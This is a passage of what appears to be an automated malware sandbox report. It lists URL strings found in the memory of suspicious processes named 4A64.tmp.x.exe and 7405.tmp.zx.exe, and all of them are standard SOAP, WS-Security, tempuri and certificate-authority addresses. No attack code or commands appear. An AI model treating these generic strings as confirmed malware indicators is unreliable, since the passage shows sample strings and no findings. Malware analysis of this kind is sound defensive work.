          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
          Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: explorer.exe, 00000004.00000002.3074143855.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://ocsp.thawte.com0
          Source: 7405.tmp.zx.exe, 00000012.00000002.2076606633.00007FFDFB05D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
          Source: explorer.exe, 00000004.00000000.1848373265.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1848816851.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3079058227.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
